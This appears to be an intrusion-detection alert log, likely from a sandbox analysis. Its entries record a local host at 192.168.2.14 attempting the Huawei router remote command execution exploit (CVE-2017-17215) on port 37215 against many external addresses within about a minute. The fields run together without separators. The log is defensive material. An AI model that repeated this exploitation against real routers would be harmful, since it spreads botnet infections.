                                                        06/13/24-21:32:25.972068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831437215192.168.2.14156.87.43.5
                                                        06/13/24-21:32:01.224234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3373637215192.168.2.14156.104.179.121
                                                        06/13/24-21:32:34.212528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794637215192.168.2.1441.169.252.114
                                                        06/13/24-21:33:09.127494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644237215192.168.2.1441.167.247.18
                                                        06/13/24-21:32:21.800741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597237215192.168.2.14156.245.213.140
                                                        06/13/24-21:32:34.196464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695637215192.168.2.1441.135.4.0
                                                        06/13/24-21:32:48.568352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4904037215192.168.2.14197.92.204.56
                                                        06/13/24-21:32:42.405545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939037215192.168.2.14197.210.237.14
                                                        06/13/24-21:32:17.693864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477237215192.168.2.14197.246.37.48
                                                        06/13/24-21:32:52.670697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338837215192.168.2.1441.130.175.4
                                                        06/13/24-21:32:11.506050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3408037215192.168.2.14197.242.90.219
                                                        06/13/24-21:33:15.273971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671837215192.168.2.14197.74.43.103
                                                        06/13/24-21:33:00.870613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3508637215192.168.2.14156.126.109.114
                                                        06/13/24-21:32:58.823665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3743437215192.168.2.14156.47.78.39
                                                        06/13/24-21:32:44.478623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621437215192.168.2.14156.70.120.35
                                                        06/13/24-21:32:03.278545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4365437215192.168.2.14197.194.155.30
                                                        06/13/24-21:32:52.658031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627237215192.168.2.1441.120.150.82
                                                        06/13/24-21:32:52.659174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441437215192.168.2.14156.11.239.82
                                                        06/13/24-21:32:21.782491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314837215192.168.2.14197.190.116.237
                                                        06/13/24-21:32:38.298952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586437215192.168.2.14156.106.136.29
                                                        06/13/24-21:32:44.454337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691037215192.168.2.14197.200.20.153
                                                        06/13/24-21:32:03.294890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4605237215192.168.2.1441.221.133.250
                                                        06/13/24-21:32:48.567455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665837215192.168.2.14197.242.46.200
                                                        06/13/24-21:32:13.547060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4742637215192.168.2.14156.117.178.24
                                                        06/13/24-21:32:03.273712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501237215192.168.2.1441.233.24.79
                                                        06/13/24-21:32:58.839986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5909237215192.168.2.14197.120.85.221
                                                        06/13/24-21:32:01.248161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3522037215192.168.2.14197.64.180.27
                                                        06/13/24-21:33:05.016552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5133037215192.168.2.14197.206.243.112
                                                        06/13/24-21:32:03.300562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407837215192.168.2.14156.157.209.9
                                                        06/13/24-21:32:07.415650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5369437215192.168.2.14156.177.102.99
                                                        06/13/24-21:32:40.356311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211837215192.168.2.14197.50.24.143
                                                        06/13/24-21:32:21.805827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158237215192.168.2.14156.130.103.141
                                                        06/13/24-21:32:05.347232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3907037215192.168.2.14197.151.26.167
                                                        06/13/24-21:32:21.783985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839837215192.168.2.1441.194.113.152
                                                        06/13/24-21:33:11.161069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5134037215192.168.2.14197.189.129.193
                                                        06/13/24-21:32:32.165694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464837215192.168.2.14197.201.254.173
                                                        06/13/24-21:32:07.420311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706837215192.168.2.1441.254.15.151
                                                        06/13/24-21:33:09.086751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5545237215192.168.2.14197.224.53.220
                                                        06/13/24-21:33:09.089078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553037215192.168.2.1441.136.29.82
                                                        06/13/24-21:33:13.211634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4125837215192.168.2.1441.95.52.55
                                                        06/13/24-21:32:36.266736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4661237215192.168.2.1441.202.115.117
                                                        06/13/24-21:32:21.802436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283037215192.168.2.14197.221.142.234
                                                        06/13/24-21:32:30.075000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786437215192.168.2.1441.197.247.247
                                                        06/13/24-21:32:23.935990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3832237215192.168.2.14156.18.228.82
                                                        06/13/24-21:32:28.024258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4213637215192.168.2.14156.93.97.95
                                                        06/13/24-21:32:30.091937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3535437215192.168.2.14197.208.70.11
                                                        06/13/24-21:32:42.404609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3704837215192.168.2.14197.94.119.137
                                                        06/13/24-21:33:11.156901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637837215192.168.2.14197.221.27.63
                                                        06/13/24-21:32:23.943429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937037215192.168.2.14197.252.161.53
                                                        06/13/24-21:32:32.151927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827837215192.168.2.14197.26.26.21
                                                        06/13/24-21:32:40.355050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097037215192.168.2.14197.51.98.253
                                                        06/13/24-21:32:42.405415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4945037215192.168.2.14156.190.203.253
                                                        06/13/24-21:32:01.223385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582837215192.168.2.14197.138.128.159
                                                        06/13/24-21:33:04.989780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5329437215192.168.2.14197.246.127.58
                                                        06/13/24-21:32:09.456601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114237215192.168.2.14197.209.200.200
                                                        06/13/24-21:32:30.079160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5690037215192.168.2.14156.237.43.107
                                                        06/13/24-21:32:58.821460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047237215192.168.2.1441.32.195.224
                                                        06/13/24-21:32:03.307782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5037237215192.168.2.14156.255.127.63
                                                        06/13/24-21:32:07.400944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503637215192.168.2.14156.148.216.75
                                                        06/13/24-21:32:54.726111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298237215192.168.2.1441.143.118.198
                                                        06/13/24-21:32:05.349135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446837215192.168.2.14156.193.174.76
                                                        06/13/24-21:32:32.164385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637637215192.168.2.14197.209.79.90
                                                        06/13/24-21:32:21.781574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067637215192.168.2.1441.41.37.6
                                                        06/13/24-21:32:28.024615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734037215192.168.2.14156.142.154.254
                                                        06/13/24-21:32:36.269864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4631237215192.168.2.1441.48.27.152
                                                        06/13/24-21:32:07.416285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014437215192.168.2.14156.238.90.151
                                                        06/13/24-21:32:09.437051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5477037215192.168.2.1441.46.136.150
                                                        06/13/24-21:32:52.680005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844037215192.168.2.14197.213.143.251
                                                        06/13/24-21:33:15.274349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285237215192.168.2.14156.221.234.12
                                                        06/13/24-21:32:07.418165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5463437215192.168.2.14197.93.168.1
                                                        06/13/24-21:33:17.306517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909437215192.168.2.14156.157.241.241
                                                        06/13/24-21:32:46.527808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5126237215192.168.2.1441.127.247.214
                                                        06/13/24-21:33:09.111031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030237215192.168.2.14156.94.221.134
                                                        06/13/24-21:33:05.014767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142037215192.168.2.14197.178.206.231
                                                        06/13/24-21:32:23.944034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886837215192.168.2.14156.214.33.78
                                                        06/13/24-21:32:21.801328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314437215192.168.2.14156.66.202.114
                                                        06/13/24-21:32:40.359424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620837215192.168.2.14197.140.33.223
                                                        06/13/24-21:31:59.197444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890637215192.168.2.14197.40.176.8
                                                        06/13/24-21:32:17.675757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392237215192.168.2.1441.211.138.243
                                                        06/13/24-21:33:15.274842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694437215192.168.2.14156.52.166.78
                                                        06/13/24-21:32:38.297210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580837215192.168.2.14156.177.185.65
                                                        06/13/24-21:32:19.728216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082637215192.168.2.14197.99.196.34
                                                        06/13/24-21:32:23.837279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4026437215192.168.2.14197.155.162.97
                                                        06/13/24-21:32:17.671582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571837215192.168.2.1441.3.245.23
                                                        06/13/24-21:32:46.510137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542237215192.168.2.1441.67.76.114
                                                        06/13/24-21:32:44.474251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5007037215192.168.2.1441.177.28.250
                                                        06/13/24-21:32:58.822647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4073037215192.168.2.14197.169.77.143
                                                        06/13/24-21:33:11.173039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5946437215192.168.2.1441.60.6.189
                                                        06/13/24-21:32:09.458807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798437215192.168.2.14197.89.81.249
                                                        06/13/24-21:32:21.784496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4280837215192.168.2.14197.66.196.168
                                                        06/13/24-21:32:42.406441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4475637215192.168.2.14197.25.234.75
                                                        06/13/24-21:32:09.437257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3847037215192.168.2.1441.53.164.196
                                                        06/13/24-21:32:50.613159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3701237215192.168.2.14156.193.229.68
                                                        06/13/24-21:32:01.239875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3784837215192.168.2.14156.151.243.30
                                                        06/13/24-21:32:05.370581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732037215192.168.2.14156.202.156.38
                                                        06/13/24-21:33:02.911017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794037215192.168.2.14197.25.33.113
                                                        06/13/24-21:32:38.303401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5801037215192.168.2.14156.27.180.192
                                                        06/13/24-21:32:01.222193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5245237215192.168.2.1441.206.185.161
                                                        06/13/24-21:33:09.108457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499437215192.168.2.14197.27.125.148
                                                        06/13/24-21:33:07.059631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998237215192.168.2.14156.200.188.196
                                                        06/13/24-21:32:28.046295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422237215192.168.2.14156.144.102.219
                                                        06/13/24-21:32:09.440774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714037215192.168.2.14156.197.194.143
                                                        06/13/24-21:32:50.614261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5526237215192.168.2.1441.197.246.100
                                                        06/13/24-21:33:07.059449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190437215192.168.2.14197.225.96.109
                                                        06/13/24-21:32:46.502189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650837215192.168.2.1441.172.223.195
                                                        06/13/24-21:32:36.245532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4986637215192.168.2.1441.43.91.194
                                                        06/13/24-21:32:17.694091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3957637215192.168.2.14197.27.180.15
                                                        06/13/24-21:32:23.931113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344237215192.168.2.1441.123.221.178
                                                        06/13/24-21:32:42.408523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067437215192.168.2.1441.38.9.120
                                                        06/13/24-21:32:23.943710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4504237215192.168.2.1441.76.188.83
                                                        06/13/24-21:32:42.419369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276437215192.168.2.14197.200.224.233
                                                        06/13/24-21:33:04.991688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756637215192.168.2.14197.24.165.58
                                                        06/13/24-21:32:25.969836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5053037215192.168.2.14156.12.29.185
                                                        06/13/24-21:32:44.454790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3900637215192.168.2.14156.67.190.66
                                                        06/13/24-21:33:09.107914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3294237215192.168.2.14197.233.214.191
                                                        06/13/24-21:31:57.090611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193837215192.168.2.14156.67.239.183
                                                        06/13/24-21:32:36.262366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3816037215192.168.2.1441.163.45.22
                                                        06/13/24-21:32:01.223098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5429237215192.168.2.14156.66.66.19
                                                        06/13/24-21:32:34.199761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518437215192.168.2.1441.31.167.128
                                                        06/13/24-21:32:01.220853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3767237215192.168.2.14156.86.152.11
                                                        06/13/24-21:32:21.802486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3667237215192.168.2.1441.23.5.18
                                                        06/13/24-21:32:30.079032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5552837215192.168.2.14156.148.108.223
                                                        06/13/24-21:32:03.309488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5059837215192.168.2.1441.131.180.209
                                                        06/13/24-21:32:50.614892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306437215192.168.2.14197.12.214.190
                                                        06/13/24-21:32:17.697566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396237215192.168.2.14197.166.167.53
                                                        06/13/24-21:33:07.039990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477837215192.168.2.1441.240.71.82
                                                        06/13/24-21:33:00.871335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4394637215192.168.2.14156.230.207.51
                                                        06/13/24-21:32:23.929762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4765237215192.168.2.14197.176.217.197
                                                        06/13/24-21:32:30.124994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5638837215192.168.2.1441.107.36.157
                                                        06/13/24-21:32:19.751821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204237215192.168.2.14156.66.140.31
                                                        06/13/24-21:32:42.406541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4871437215192.168.2.1441.174.212.207
                                                        06/13/24-21:32:28.045603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414637215192.168.2.14197.109.24.113
                                                        06/13/24-21:32:40.355145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4193237215192.168.2.1441.139.132.20
                                                        06/13/24-21:32:58.823698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001837215192.168.2.1441.197.178.12
                                                        06/13/24-21:32:32.149376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378037215192.168.2.14156.119.171.198
                                                        06/13/24-21:32:11.506083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416437215192.168.2.1441.134.241.104
                                                        06/13/24-21:33:17.307978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479237215192.168.2.14197.174.220.51
                                                        06/13/24-21:32:38.317561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571837215192.168.2.14156.83.33.230
                                                        06/13/24-21:32:03.305444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5872637215192.168.2.14156.100.135.200
                                                        06/13/24-21:32:54.707731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131837215192.168.2.1441.213.252.217
                                                        06/13/24-21:33:04.993825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5031637215192.168.2.1441.185.96.231
                                                        06/13/24-21:32:30.097072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3942037215192.168.2.1441.94.78.239
                                                        06/13/24-21:32:54.725452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061637215192.168.2.14197.59.162.40
                                                        06/13/24-21:33:13.212470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927237215192.168.2.1441.31.48.179
                                                        06/13/24-21:32:36.242778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581837215192.168.2.1441.107.165.210
                                                        06/13/24-21:32:34.217222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912837215192.168.2.14197.217.72.69
                                                        06/13/24-21:32:28.028804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744037215192.168.2.1441.112.95.107
                                                        06/13/24-21:32:36.248431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275637215192.168.2.14156.168.190.45
                                                        06/13/24-21:33:00.870655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4955237215192.168.2.14156.187.199.122
                                                        06/13/24-21:32:30.128404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800437215192.168.2.1441.75.121.102
                                                        06/13/24-21:33:15.253699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015037215192.168.2.14197.135.3.165
                                                        06/13/24-21:32:09.458377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4189837215192.168.2.14156.23.44.159
                                                        06/13/24-21:32:13.568940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4356037215192.168.2.14156.237.130.70
                                                        06/13/24-21:32:48.568447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5666637215192.168.2.14156.138.3.201
                                                        06/13/24-21:32:36.264433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3912437215192.168.2.14156.209.235.34
                                                        06/13/24-21:33:00.867910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306637215192.168.2.14197.28.17.235
                                                        06/13/24-21:32:25.993009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490637215192.168.2.1441.221.42.78
                                                        06/13/24-21:32:13.544337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483437215192.168.2.14156.159.119.117
                                                        06/13/24-21:33:11.155380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585437215192.168.2.14197.115.70.158
                                                        06/13/24-21:32:19.728856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3893837215192.168.2.14197.175.125.91
                                                        06/13/24-21:32:28.042558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5385037215192.168.2.1441.213.132.198
                                                        06/13/24-21:32:36.266433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4406037215192.168.2.14197.116.109.200
                                                        06/13/24-21:32:13.543901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4129837215192.168.2.1441.169.157.42
                                                        06/13/24-21:33:11.158705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4398837215192.168.2.1441.88.75.141
                                                        06/13/24-21:32:50.629115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5031637215192.168.2.14156.55.251.26
                                                        06/13/24-21:32:13.544659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354637215192.168.2.14156.250.91.175
                                                        06/13/24-21:33:07.041192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4583637215192.168.2.1441.81.143.39
                                                        06/13/24-21:33:09.129556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855437215192.168.2.14156.21.178.81
                                                        06/13/24-21:32:03.278337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261037215192.168.2.1441.228.70.82
                                                        06/13/24-21:32:46.528499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113037215192.168.2.1441.194.7.23
                                                        06/13/24-21:32:34.216364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4707637215192.168.2.14197.176.14.114
                                                        06/13/24-21:31:57.136091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257637215192.168.2.14156.98.225.29
                                                        06/13/24-21:32:25.971902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442837215192.168.2.1441.227.32.135
                                                        06/13/24-21:33:07.038893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708637215192.168.2.14156.192.231.41
                                                        06/13/24-21:32:03.274847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5678437215192.168.2.14156.120.5.105
                                                        06/13/24-21:32:44.451688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964837215192.168.2.14156.139.98.87
                                                        06/13/24-21:32:48.551216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5888837215192.168.2.14197.207.120.170
                                                        06/13/24-21:32:50.631663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684837215192.168.2.14156.157.232.197
                                                        06/13/24-21:32:38.297833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510837215192.168.2.14156.33.33.87
                                                        06/13/24-21:32:19.728149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824237215192.168.2.14197.29.9.203
                                                        06/13/24-21:32:36.245703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5795237215192.168.2.14197.52.215.156
                                                        06/13/24-21:32:32.154012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692837215192.168.2.14197.147.210.44
                                                        06/13/24-21:32:01.219029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405837215192.168.2.14156.126.111.142
                                                        06/13/24-21:33:09.090763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352037215192.168.2.14197.57.59.139
                                                        06/13/24-21:32:28.043908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192237215192.168.2.14197.62.80.135
                                                        06/13/24-21:32:48.553772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826037215192.168.2.14156.153.121.138
